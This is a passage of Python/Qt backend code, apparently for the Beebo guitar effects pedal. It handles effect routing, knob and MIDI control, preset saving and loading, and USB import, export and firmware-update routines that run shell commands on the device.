selected_dest_effect_ports.setStringList(ports)\n\n @Slot(str)\n def list_connected(self, effect_id):\n ports = []\n for source_port, connected in port_connections.items():\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n display_s_port = effect_prototypes[current_effects[s_effect][\"effect_type\"]][\"inputs\"][s_port][0]\n # connections where we are target\n for c_effect, c_port in connected:\n display_c_port = effect_prototypes[current_effects[c_effect][\"effect_type\"]][\"outputs\"][c_port][0]\n if c_effect == effect_id:\n ports.append(\"output===\"+display_c_port+\" connected to \"+s_effect.rsplit(\"/\", 1)[1]+\" \"+ display_s_port +\"===\"+s_effect+\"/\"+s_port+\"---\"+c_effect+\"/\"+c_port)\n elif s_effect == effect_id:\n ports.append(\"input===\"+c_effect.rsplit(\"/\", 1)[1]+ \" \"+display_c_port+\" connected to \"+display_s_port+\"===\"+s_effect+\"/\"+s_port+\"---\"+c_effect+\"/\"+c_port)\n # debug_print(\"connected ports:\", ports, effect_id)\n # qWarning(\"connected Ports \"+ str(ports) + \" \" + effect_id)\n ports.sort()\n selected_source_effect_ports.setStringList(ports)\n\n @Slot(str, str)\n def disconnect_port(self, port_pair, original_item):\n ports_list = [v for v in selected_source_effect_ports.stringList() if v != original_item]\n selected_source_effect_ports.setStringList(ports_list)\n\n target_pair, source_pair = port_pair.split(\"---\")\n t_effect, t_port = target_pair.rsplit(\"/\", 1)\n # debug_print(\"### disconnect, port pair\", port_pair)\n\n s_effect, s_port = source_pair.rsplit(\"/\", 1)\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n if t_effect_type in bare_ports:\n if s_effect_type in bare_ports:\n ingen_wrapper.disconnect_port(s_effect, t_effect)\n else:\n ingen_wrapper.disconnect_port(source_pair, t_effect)\n else:\n if s_effect_type in bare_ports:\n ingen_wrapper.disconnect_port(s_effect, target_pair)\n else:\n ingen_wrapper.disconnect_port(source_pair, target_pair)\n\n @Slot(str)\n def add_new_effect(self, effect_type):\n # calls backend to add effect\n global seq_num\n seq_num = seq_num + 1\n debug_print(\"add new effect\", effect_type)\n # if there's existing effects of this type, increment the ID\n is_bare_port = effect_type in bare_ports\n num_sep = \"\"\n if is_bare_port:\n num_sep = \"_\"\n\n effect_name = current_sub_graph+effect_type+num_sep+str(1)\n for i in range(1, 1000):\n if current_sub_graph+effect_type+num_sep+str(i) not in current_effects:\n effect_name = current_sub_graph+effect_type+num_sep+str(i)\n break\n\n if is_bare_port:\n # debug_print(\"new effect si bare port\")\n bare_ports_map = {\"input\" : \"in\", \"output\" : \"out\", \"midi_input\" : \"midi_in\",\n \"midi_output\" : \"midi_out\", \"loop_common_in\" : \"out\",\n \"loop_common_out\" : \"in\",\n \"loop_extra_midi\": \"midi_out\", \"loop_midi_out\": \"midi_in\"}\n if bare_ports_map[effect_type] == \"in\":\n ingen_wrapper.add_input(effect_name, 900, 150)\n elif bare_ports_map[effect_type] == \"out\":\n ingen_wrapper.add_output(effect_name, 900, 150)\n elif effect_type == \"loop_extra_midi\":\n ingen_wrapper.add_loop_extra_midi(effect_name, 900, 150)\n elif effect_type == \"loop_midi_out\":\n ingen_wrapper.add_loop_midi_out(effect_name, 900, 150)\n # ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n else:\n ingen_wrapper.add_plugin(effect_name, effect_type_map[effect_type])\n # from_backend_new_effect(effect_name, effect_type)\n\n\n @Slot(str, bool)\n def set_bypass(self, effect_name, 
is_active):\n # check if we're a kill_dry module; if so, toggle the \"enabled\" control, else just call default ingen:enabled\n effect_type = current_effects[effect_name][\"effect_type\"]\n if \"kill_dry\" in effect_prototypes[effect_type]:\n v = 1.0 - (current_effects[effect_name][\"controls\"][\"enabled\"].value)\n knobs.ui_knob_change(effect_name, \"enabled\", v)\n current_effects[effect_name][\"enabled\"].value = bool(v)\n else:\n ingen_wrapper.set_bypass(effect_name, is_active)\n\n @Slot(str)\n def set_description(self, description):\n ingen_wrapper.set_description(current_sub_graph.rstrip(\"/\"), description)\n preset_description.name = description\n\n @Slot(str, int, int)\n def move_effect(self, effect_name, x, y):\n try:\n current_effects[effect_name][\"x\"] = x\n current_effects[effect_name][\"y\"] = y\n except KeyError:\n pass\n ingen_wrapper.set_plugin_position(effect_name, x, y)\n\n @Slot(str)\n def remove_effect(self, effect_id):\n # calls backend to remove effect\n # debug_print(\"remove effect\", effect_id)\n # if effect is loopler we need to just hide it instead, because otherwise Ingen crashes\n if effect_id in current_effects and current_effects[effect_id][\"effect_type\"] in loopler_modules:\n # find all connections and remove them, disconnect plugin doesn't work\n for source_port, targets in list(port_connections.items()):\n # target_pair, source_pair = port_pair.split(\"---\")\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n if s_effect == effect_id:\n for e, p in port_connections[source_port]:\n knobs.disconnect_port(source_port + \"---\" + \"/\".join([e, p]), False)\n else:\n for e, p in port_connections[source_port]:\n if e == effect_id:\n knobs.disconnect_port(\"/\".join([e, p]) + \"---\" + source_port, False)\n from_backend_remove_effect(effect_id)\n # ingen_wrapper.remove_plugin(effect_id)\n else:\n ingen_wrapper.remove_plugin(effect_id)\n\n @Slot(str, str, 'double')\n def ui_knob_change(self, effect_name, parameter, value):\n # debug_print(x, y, z)\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n current_effects[effect_name][\"controls\"][parameter].value = value\n # clamping here to make it a bit more obvious\n value = clamp(value, current_effects[effect_name][\"controls\"][parameter].rmin, current_effects[effect_name][\"controls\"][parameter].rmax)\n # a bit sketchy, but check for BPM changes here XXX\n if parameter == \"bpm\":\n set_bpm(value)\n\n ingen_wrapper.set_parameter_value(effect_name+\"/\"+parameter, value)\n else:\n debug_print(\"effect not found\", effect_name, parameter, value, effect_name in current_effects)\n\n @Slot(str, str, bool)\n def ui_knob_inc(self, effect_name, parameter, is_inc=True):\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n v = current_effects[effect_name][\"controls\"][parameter].value\n change = abs(v / 10.0)\n if change < 0.01:\n change = 0.01\n\n if is_inc:\n v = v + change\n else:\n v = v - change\n # clamping here to make it a bit more obvious\n v = clamp(v, current_effects[effect_name][\"controls\"][parameter].rmin, current_effects[effect_name][\"controls\"][parameter].rmax)\n # a bit sketchy, but check for BPM changes here XXX
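\n # a control named \"bpm\" doubles as the global tempo: set_bpm() (defined\n # further down) mirrors the new value into current_bpm for the rest of the UI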
\n if parameter == \"bpm\":\n set_bpm(v)\n\n current_effects[effect_name][\"controls\"][parameter].value = v\n ingen_wrapper.set_parameter_value(effect_name+\"/\"+parameter, v)\n else:\n debug_print(\"effect not found\", effect_name, parameter, effect_name in current_effects)\n\n @Slot(str, str)\n def update_ir(self, effect_id, ir_file):\n is_cab = True\n prefix=\"file://\"\n effect_type = current_effects[effect_id][\"effect_type\"]\n if effect_type in [\"mono_reverb\", \"stereo_reverb\", \"quad_ir_reverb\"]:\n is_cab = False\n\n if \"file://\" in ir_file:\n prefix=''\n\n current_effects[effect_id][\"controls\"][\"ir\"].name = ir_file\n # ir_browser_model_s.external_ir_set(ir_file)\n # print(\"#### file\", ir_file, \"prefix\", prefix)\n ingen_wrapper.set_file(effect_id, prefix+ir_file, is_cab)\n\n @Slot(str, str)\n def update_json(self, effect_id, ir_file):\n effect_type = current_effects[effect_id][\"effect_type\"]\n current_effects[effect_id][\"controls\"][\"ir\"].name = ir_file\n if effect_type == \"amp_rtneural\":\n ingen_wrapper.set_json(effect_id, ir_file)\n else:\n ingen_wrapper.set_json_nam(effect_id, ir_file)\n\n @Slot()\n def ui_load_empty_preset(self, force=False):\n if force:\n # load_preset(\"file:///mnt/presets/beebo/Empty.ingen/main.ttl\", True)\n knobs.ui_load_qa_preset_by_name(\"file:///mnt/presets/beebo/Empty.ingen\")\n else:\n knobs.ui_load_preset_by_name(\"file:///mnt/presets/beebo/Empty.ingen\")\n\n\n @Slot(str)\n def ui_load_preset_by_name(self, preset_file):\n if is_loading.value == True:\n return\n\n patch_bay_notify.loading_preset.emit(True)\n # debug_print(\"loading\", preset_file)\n # outfile = preset_file[7:] # strip file:// prefix\n load_preset(preset_file+\"/main.ttl\")\n current_preset.name = preset_file.strip(\"/\").split(\"/\")[-1][:-6]\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = preset_file[7:]\n update_counter.value+=1\n\n @Slot(str)\n def ui_load_qa_preset_by_name(self, preset_file):\n if is_loading.value == True:\n return\n\n # debug_print(\"loading\", preset_file)\n # outfile = preset_file[7:] # strip file:// prefix\n load_preset(preset_file+\"/main.ttl\")\n current_preset.name = preset_file.strip(\"/\").split(\"/\")[-1][:-6]\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = preset_file[7:]\n update_counter.value+=1\n\n @Slot(str)\n def ui_save_pedalboard(self, pedalboard_name):\n # debug_print(\"saving\", preset_name)\n # TODO add folders\n if pedalboard_name.lower() == 'empty':\n return\n\n current_preset.name = pedalboard_name\n ingen_wrapper.set_author(current_sub_graph.rstrip(\"/\"), pedal_state[\"author\"])\n ingen_wrapper.save_pedalboard(\"beebo\", pedalboard_name, current_sub_graph.rstrip(\"/\"))\n self.launch_task(2, os.sync) # wait 2 seconds then sync to drive\n # update preset meta\n clean_filename = ingen_wrapper.get_valid_filename(pedalboard_name)\n if len(clean_filename) > 0:\n filename = \"/mnt/presets/beebo/\"+clean_filename+\".ingen\"\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = filename\n if filename in preset_meta_data:\n preset_meta_data[filename][\"author\"] = pedal_state[\"author\"]\n preset_meta_data[filename][\"description\"] = preset_description.name\n else:
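\n # first save of this preset: start a fresh meta record; \"tags\" only\n # appear after get_meta_from_files rescans the preset files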
\n preset_meta_data[filename] = {\"author\": pedal_state[\"author\"], \"description\": preset_description.name}\n\n # check if loopler in use\n if loopler_in_use():\n # print(\"loopler in use\", loopler_in_use())\n loopler_file = filename + \"/loopler.slsess\"\n Path(filename).mkdir(parents=True, exist_ok=True)\n loopler.save_session(loopler_file)\n loopler_midi_file = filename + \"/loopler.slb\"\n loopler.save_midi_bindings(loopler_midi_file)\n else:\n # print(\"loopler not in use\")\n loopler_file = filename + \"/loopler.slsess\"\n loopler_midi_file = filename + \"/loopler.slb\"\n # we detect loopler presence by the file, so delete it if it is present and not enabled\n if os.path.exists(loopler_file):\n os.remove(loopler_file)\n if os.path.exists(loopler_midi_file):\n os.remove(loopler_midi_file)\n\n\n # flush to file\n write_preset_meta_cache()\n\n @Slot(str)\n def toggle_favourite(self, preset_file):\n # print(\"toggling fav\")\n p_f = preset_file[7:]\n if p_f in favourites[\"presets\"]:\n favourites[\"presets\"].pop(p_f)\n elif p_f in preset_meta_data:\n favourites[\"presets\"][p_f] = True\n else:\n return\n context.setContextProperty(\"favourites\", favourites)\n # flush to file\n write_favourites_data()\n preset_browser_model_s.add_filter()\n\n @Slot(str)\n def toggle_module_favourite(self, effect_type):\n # print(\"toggling fav\")\n if effect_type in favourites[\"modules\"]:\n favourites[\"modules\"].pop(effect_type)\n else:\n favourites[\"modules\"][effect_type] = True\n context.setContextProperty(\"favourites\", favourites)\n # flush to file\n write_favourites_data()\n module_browser_model_s.add_filter()\n\n @Slot()\n def ui_copy_irs(self):\n # debug_print(\"copy irs from USB\")\n # could convert any that aren't 48khz; instead we only copy ones that are\n # remount RW \n # copy all wavs in /usb_flash/reverbs and /usb_flash/cabs to /mnt/audio/reverbs and /mnt/audio/cabs\n # remount RO \n command = \"\"\" sudo mount -o remount,rw /dev/mmcblk0p2 /mnt; if [ -d /usb_flash/reverbs ]; then cd /usb_flash/reverbs; rename 's/[^a-zA-Z0-9. _-]/_/g' **; find . -iname \"*.wav\" -type f -exec sh -c 'test $(soxi -r \"$0\") = \"48000\"' {} \; -print0 | xargs -0 cp --target-directory=/mnt/audio/reverbs --parents; fi;\n if [ -d /usb_flash/cabs ]; then cd /usb_flash/cabs; rename 's/[^a-zA-Z0-9. _-]/_/g' **; find . -iname \"*.wav\" -type f -exec sh -c 'test $(soxi -r \"$0\") = \"48000\"' {} \; -print0 | xargs -0 cp --target-directory=/mnt/audio/cabs --parents; fi; sudo mount -o remount,ro /dev/mmcblk0p2 /mnt;\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command, after=ir_browser_model.combine_metadata)\n\n @Slot()\n def ui_copy_amps(self):\n # remount RW \n # copy all zips in /usb_flash/amps to /mnt/audio/amp_nam\n # remount RO \n command = \"\"\" sudo mount -o remount,rw /dev/mmcblk0p2 /mnt;\n if [ -d /usb_flash/amps ]; then\n cd /usb_flash/amps; rename 's/[^a-zA-Z0-9. _-]/_/g' **;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 cp --target-directory=/mnt/audio/amp_nam --parents;\n cd /mnt/audio/amp_nam/;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 -n1 unzip;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 rm;\n fi;\n sudo mount -o remount,ro /dev/mmcblk0p2 /mnt;\"\"\"
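\n # the data partition is normally mounted read-only; every USB import/delete\n # helper brackets its work with remount-rw ... remount-ro (same pattern as ui_copy_irs)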
\n command_status[0].value = -1\n\n self.launch_subprocess(command, after=amp_browser_model_s.external_update_reset)\n\n @Slot(str, result=str)\n def ui_usb_folder_size(self, folder):\n # return how large a USB folder is, just du the folder, will give us an approx idea of what will be copied\n try:\n return du(folder)\n except:\n return \"Folder not found\"\n\n @Slot(result=str)\n def remaining_user_storage(self):\n # return how much space is available\n return subprocess.check_output(['df','-h', '--output=avail', '/dev/mmcblk0p2']).split()[1].decode('utf-8')\n\n @Slot(result=str)\n def usb_information_text(self):\n # build the USB summary text shown in the UI\n return f\"\"\"\nUSB info\n\nCabs: {self.ui_usb_folder_size(\"/usb_flash/cabs\")}\n\nReverbs: {self.ui_usb_folder_size(\"/usb_flash/reverbs\")}\n\nAmps: {self.ui_usb_folder_size(\"/usb_flash/amps\")}\n\nRemaining user storage\n\n{self.remaining_user_storage()}
\n \"\"\"\n\n @Slot()\n def import_presets(self):\n # debug_print(\"copy presets from USB\")\n # could convert any that aren't 48khz.\n # instead we just only copy ones that are\n command = \"\"\"cd /usb_flash/presets;\n if test -n \"$(find /usb_flash/presets/ -maxdepth 1 -name '*.ingen' -print -quit)\";\n then find . -iname \"*.ingen\" -type d -print0 | xargs -0 cp -r --target-directory=/mnt/presets --parents;\n fi\n if test -n \"$(find /usb_flash/presets/ -maxdepth 1 -name '*.instr' -print -quit)\";\n then cd /mnt/presets;\n find /usb_flash/presets/ -iname \"*.instr\" -type f -exec tar -xjf {} \\; ;\n fi\n find /mnt/presets/digit/ -iname '*.ingen' -type d -exec mv -t /mnt/presets/beebo/ {} + ;\n rm -rf /mnt/presets/digit/*\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command, after=get_meta_from_files)\n # after presets have copied we need to parse all the tags / author and update cache\n\n @Slot()\n def export_presets(self):\n # debug_print(\"copy presets to USB\")\n # export as tar.bz2\n # \n command = \"\"\"cd /mnt/presets; mkdir -p /usb_flash/presets; find . -iname \"*.ingen\" -type d -exec bash -c 'tar -cjf /usb_flash/presets/$(basename \"$@\" .ingen).instr $@' _ {} \\; ;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def export_current_preset(self):\n # debug_print(\"copy current preset to USB\")\n i = current_preset_filename.find(\"presets\")+len(\"presets\")+1\n out_file = current_preset_filename[i:] # strip starting folders\n command = \"\"\"cd /mnt/presets; mkdir -p /usb_flash/presets; tar -cjf /usb_flash/presets/\"\"\"+out_file.split(\"/\")[1][:-len(\".ingen\")]+\".instr \" + out_file +\"\"\" ;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def copy_logs(self):\n # debug_print(\"copy presets to USB\")\n # could convert any that aren't 48khz.\n # instead we just only copy ones that are\n command = \"\"\"mkdir -p /usb_flash/logs; sudo cp /var/log/syslog /usb_flash/logs/;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def ui_shutdown(self):\n ret_obj = subprocess.run(\"shutdown -h 'now'\", shell=True)\n\n @Slot()\n def ui_update_firmware(self):\n # debug_print(\"Updating firmware\")\n # dpkg the debs in the folder\n # report if files can't be found, see if no usb drive is found, or if it's incompatible.\n # clear preset to save CPU\n self.ui_load_empty_preset(True)\n # if the drive can't be remounted RW then auto repair the drive and restart\n # /sbin/e2fsck -fy /dev/mmcblk0p1\n command_status[0].name = \"Firmware update failed. The files were found, the flash drive appears to work but something else happened, please contact us. info@polyeffects.com Extra debugging info:\"\n if len(glob.glob(\"/usb_flash/*.deb\")) > 0:\n command = \"\"\"sudo /usr/bin/polyoverlayroot-chroot dpkg -i -E -G /usb_flash/*.deb && sync && sudo shutdown -h 'now'\"\"\"\n # sync then sleep before shutdown\n command_status[0].value = -1\n self.launch_subprocess(command)\n else:\n # no files found, is there a usb drive?\n if os.path.exists(\"/dev/sda2\"):\n command_status[0].name = \"\"\"Firmware update failed. 
There's a USB drive inserted but it's got more partitions than we expect...\nyou'll need to flash the USB flash drive to a format that works for Beebo, please follow the instructions on the website\"\"\"\n elif os.path.exists(\"/dev/sda1\"):\n # usb drive found, no files\n command_status[0].name = \"\"\"Firmware update failed. There's a USB drive inserted but it doesn't have the files unzipped directly on the drive.\nPlease unzip the update and copy it directly to the drive. If that doesn't work, please contact info@polyeffects.com\"\"\"\n elif os.path.exists(\"/dev/sda\"):\n command_status[0].name = \"\"\"Firmware update failed. There's a USB drive inserted but it doesn't have any partitions on it...\nyou'll need to flash the USB flash drive to a format that works for Beebo, please follow the instructions on the website\"\"\"\n else:\n command_status[0].name = \"\"\"Firmware update failed. No USB drive found. If you've got another one please try that. If that doesn't work please contact us, info@polyeffects.com\"\"\"\n\n command_status[0].value = 1\n\n @Slot()\n def ui_run_debug(self):\n # any *.sh on the drive triggers the run, but only debug.sh is executed\n if len(glob.glob(\"/usb_flash/*.sh\")) > 0:\n command = \"\"\"sudo /bin/bash /usb_flash/debug.sh\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n else:\n command_status[0].value = 1\n\n\n @Slot(int)\n def set_input_level(self, level, write=True):\n debug_print(\"setting input_level, \", level, input_level.value)\n if IS_REMOTE_TEST:\n return\n command = \"amixer -- sset ADC1 \"+str(level)+\"db; amixer -- sset ADC2 \"+str(level)+\"db; amixer -- sset ADC3 \"+str(level)+\"db\"\n command_status[0].value = subprocess.call(command, shell=True)\n if hardware_info[\"revision\"] < 10 and pedal_state[\"model\"] != \"hector\":\n command = \"amixer -- sset 'ADC1 Invert' off,on; amixer -- sset 'ADC2 Invert' on,on\"\n elif pedal_state[\"model\"] == \"hector\":\n command = (\"amixer -- sset 'ADC1 Invert' on,on; amixer -- sset 'ADC2 Invert' on,on; amixer -- sset 'ADC3 Invert' on,on; \"\n \"amixer -- sset 'DAC1 Invert' on,on; amixer -- sset 'DAC2 Invert' on,on; amixer -- sset 'DAC3 Invert' on,on; amixer -- sset 'DAC4 Invert' on,on;\")\n else:\n command = \"amixer -- sset 'ADC1 Invert' on,on; amixer -- sset 'ADC2 Invert' on,on\"\n\n command_status[0].value = subprocess.call(command, shell=True)\n input_level.value = level\n if write:\n pedal_state[\"input_level\"] = level\n write_pedal_state()\n\n @Slot(int)\n def set_channel(self, channel):\n # debug_print(\"setting channel, \", channel, midi_channel.value)\n midi_channel.value = channel\n pedal_state[\"midi_channel\"] = midi_channel.value\n write_pedal_state()\n\n @Slot(bool)\n def set_enc_invert(self, invert):\n pedal_state[\"invert_enc\"] = invert\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(bool)\n def set_l_to_r(self, l_to_r):\n pedal_state[\"l_to_r\"] = l_to_r\n context.setContextProperty(\"pedalState\", pedal_state)\n is_l_to_r.value = l_to_r\n write_pedal_state()\n\n @Slot(bool)\n def set_d_is_tuner(self, d_is_tuner):\n pedal_state[\"d_is_tuner\"] = d_is_tuner\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(bool)\n def set_thru_enabled(self, thru_on):\n pedal_state[\"thru\"] = thru_on\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n try:\n if thru_on:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n else:\n command = [\"/usr/bin/jack_disconnect\", 
\"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n except:\n pass\n\n @Slot()\n def flip_screen(self):\n if \"screen_flipped\" in pedal_state:\n pedal_state[\"screen_flipped\"] = not pedal_state[\"screen_flipped\"]\n else:\n pedal_state[\"screen_flipped\"] = True\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(int)\n def set_preset_list_length(self, v):\n if v > len(preset_list_model.stringList()):\n # debug_print(\"inserting new row in preset list\", v)\n insert_row(preset_list_model, \"file:///mnt/presets/beebo/Default_Preset.ingen\")\n else:\n # debug_print(\"removing row in preset list\", v)\n preset_list_model.removeRows(v, 1)\n\n @Slot(int, str)\n def map_preset(self, v, name):\n preset_list_model.setData(preset_list_model.index(v), name)\n\n @Slot()\n def save_preset_list(self):\n # debug_print(\"saving preset list\")\n with open(\"/mnt/pedal_state/beebo_preset_list.json\", \"w\") as f:\n json.dump(preset_list_model.stringList(), f)\n os.sync()\n\n @Slot()\n def reset_preset_list(self):\n preset_list = [\"file:///mnt/presets/beebo/Empty.ingen\"]\n preset_list_model.setStringList(preset_list)\n self.save_preset_list()\n\n @Slot(int)\n def on_worker_done(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[0].value = ret_var\n\n @Slot(str)\n def on_worker_done_output(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[1].name = ret_var\n\n @Slot(int)\n def on_task_done(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[0].value = ret_var\n\n def launch_subprocess(self, command, after=None):\n # debug_print(\"launch_threadpool\")\n worker = MyWorker(command, after)\n worker.emitter.done.connect(self.on_worker_done)\n worker.emitter.stdout.connect(self.on_worker_done_output)\n worker_pool.start(worker)\n\n def launch_task(self, delay, command):\n # debug_print(\"launch_threadpool\")\n worker = MyTask(delay, command)\n # worker.emitter.done.connect(self.on_worker_done)\n worker_pool.start(worker)\n\n @Slot(str, str)\n def set_knob_current_effect(self, effect_id, parameter):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n if not (knob_map[knob].effect == effect_id and knob_map[knob].parameter == parameter):\n knob_map[knob].effect = effect_id\n knob_map[knob].parameter = parameter\n knob_map[knob].rmin = current_effects[effect_id][\"controls\"][parameter].rmin\n knob_map[knob].rmax = current_effects[effect_id][\"controls\"][parameter].rmax\n knob_map[knob].is_loopler = False\n\n @Slot()\n def clear_knob_effect(self):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n knob_map[knob].effect = \"\"\n knob_map[knob].parameter = \"\"\n knob_map[knob].rmin = 0\n knob_map[knob].rmax = 1\n knob_map[knob].is_loopler = False\n\n @Slot(str, int, str, float, float)\n def set_loopler_knob(self, effect_id, loop_index, parameter, rmin, rmax):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n if not (knob_map[knob].effect == effect_id and knob_map[knob].parameter == parameter and\n knob_map[knob].loop_index == loop_index):\n knob_map[knob].effect = effect_id\n knob_map[knob].parameter = parameter\n knob_map[knob].rmin = rmin\n knob_map[knob].rmax = rmax\n knob_map[knob].is_loopler = True\n knob_map[knob].loop_index = loop_index\n\n @Slot(str)\n def 
set_pedal_model(self, pedal_model):\n if is_loading.value == True:\n return\n pedal_state[\"model\"] = pedal_model\n write_pedal_state()\n change_pedal_model(pedal_model)\n\n @Slot(str)\n def delete_ir(self, ir):\n # debug_print(\"delete: ir files is \", ir)\n ir = ir[len(\"file://\"):]\n # can be a directory or file\n # check if it isn't a base dir. \n if \"imported\" not in ir or ir in [\"/audio/cabs/imported\", \"/audio/reverbs/imported\"]:\n return\n # delete\n # remount as RW\n command = \"sudo mount -o remount,rw /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n try:\n os.remove(ir)\n except IsADirectoryError:\n shutil.rmtree(ir)\n os.sync()\n # remount as RO\n command = \"sudo mount -o remount,ro /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n\n @Slot()\n def delete_all_irs(self):\n # can be a directory or file\n # check if it isn't a base dir. \n # delete\n # remount as RW\n command = \"sudo mount -o remount,rw /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n shutil.rmtree(\"/mnt/audio/cabs\")\n shutil.rmtree(\"/mnt/audio/reverbs\")\n os.mkdir(\"/mnt/audio/cabs\")\n os.mkdir(\"/mnt/audio/reverbs\")\n os.sync()\n # remount as RO\n command = \"sudo mount -o remount,ro /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n\n @Slot(str)\n def delete_preset(self, in_preset_file):\n preset_file = in_preset_file[len(\"file://\"):]\n debug_print(\"delete: preset_file is \", preset_file)\n # is always a directory\n # empty / default presets can't be deleted\n if \".ingen\" not in preset_file or preset_file in [\"/mnt/presets/digit/Default_Preset.ingen\", \"/mnt/presets/beebo/Empty.ingen\", \"/mnt/presets/digit/Empty.ingen\"]:\n return\n # delete\n try: # if it doesn't exist, we still want to remove it from the preset list and meta cache\n shutil.rmtree(preset_file)\n except:\n pass\n # remove from set list.\n preset_list = preset_list_model.stringList()\n debug_print(\"preset list is\", preset_list)\n if in_preset_file in preset_list:\n preset_list = [v for v in preset_list if v != in_preset_file]\n preset_list_model.setStringList(preset_list)\n self.save_preset_list()\n preset_meta_data.pop(preset_file, False)\n write_preset_meta_cache()\n os.sync()\n\n @Slot(str)\n def set_pedal_author(self, author):\n pedal_state[\"author\"] = author\n write_pedal_state()\n context.setContextProperty(\"pedalState\", pedal_state)\n\n @Slot(int, str)\n def set_current_mode(self, mode, effect_name):\n # debug_print(\"updating UI\")\n global current_patchbay_mode\n global current_selected_effect\n current_patchbay_mode = mode\n current_selected_effect = effect_name\n\n @Slot()\n def get_ip(self):\n ret_obj = subprocess.run(\"hostname -I\", capture_output=True, shell=True)\n current_ip.name = ret_obj.stdout.decode()\n\n @Slot(str, bool)\n def set_broadcast(self, effect_name, is_broadcast):\n if (effect_name in current_effects) and (\"broadcast_ports\" in current_effects[effect_name]):\n for parameter in current_effects[effect_name][\"broadcast_ports\"].keys():\n ingen_wrapper.set_broadcast(effect_name+\"/\"+parameter, is_broadcast)\n else:\n debug_print(\"effect not found\", effect_name, effect_name in current_effects)
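\n\n # MIDI mapping is toggle-style: a second \"learn\" on a mapped control forgets it.\n # A learned CC is packed into a single int -- channel in the high byte, controller\n # number in the low byte -- unpacked below with (cc >> 8)+1 and cc & 0xFF.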
\n @Slot(str, str)\n def midi_learn(self, effect_name, parameter):\n # this toggles: if a CC is already learned, forget it. There is currently no way to cancel waiting for MIDI\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n if current_effects[effect_name][\"controls\"][parameter].cc > -1:\n # have current, forget\n ingen_wrapper.midi_forget(effect_name+\"/\"+parameter)\n else:\n ingen_wrapper.midi_learn(effect_name+\"/\"+parameter)\n else:\n debug_print(\"effect not found\", effect_name, parameter, effect_name in current_effects)\n\n @Slot(result=str)\n def get_midi_assignments(self):\n r = \"MIDI Assignments \n\"\n for effect_name in current_effects:\n\n effect_display_name = effect_name.rsplit(\"/\", 1)[1].rstrip(\"1\").replace(\"_\", \" \")\n for parameter in current_effects[effect_name][\"controls\"]:\n cc = current_effects[effect_name][\"controls\"][parameter].cc\n parameter_name = current_effects[effect_name][\"controls\"][parameter].name\n if cc > -1:\n r = r + f\"Effect: {effect_display_name} Parameter: {parameter_name} Channel: {(cc >> 8)+1} CC: {cc & 0xFF}\n\"\n return r\n\n @Slot(str)\n def finish_remove_effect(self, effect_name):\n try:\n current_effects.pop(effect_name) # done after UI removes it\n except:\n pass\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n\n @Slot(str, str)\n def expose_spotlight(self, effect_name, parameter):\n # this toggles spotlight exposure; at most 10 entries, the oldest is evicted\n l_spotlight_entries = [b for b in self.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if l_spotlight_entries != []:\n spotlight_entry = l_spotlight_entries[0]\n # remove it\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n ingen_wrapper.spotlight_remove(effect_name+\"/\"+parameter)\n self.spotlight_entries.remove(spotlight_entry)\n else:\n self.spotlight_entries.append([effect_name, parameter, \"1\"])\n if len(self.spotlight_entries) > 10:\n e_r, p_r, p_v = self.spotlight_entries.pop(0)\n spotlight_entries_changed(e_r, p_r, '', p_v)\n ingen_wrapper.spotlight_remove(e_r+\"/\"+p_r)\n ingen_wrapper.spotlight_set(effect_name+\"/\"+parameter, \"1\")\n\n @Slot(str, str, str)\n def toggle_spotlight_binding(self, effect_name, parameter, control):\n # this toggles, control is l, r, x, y\n spotlight_entry = [b for b in self.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if spotlight_entry == []:\n # shouldn't ever happen, spotlight should be bound already\n return\n i = self.spotlight_entries.index(spotlight_entry[0])\n\n current_v = spotlight_entry[0][2]\n prev_v = current_v\n\n\n if control in current_v:\n current_v = current_v.replace(control, \"\")\n else:\n current_v = 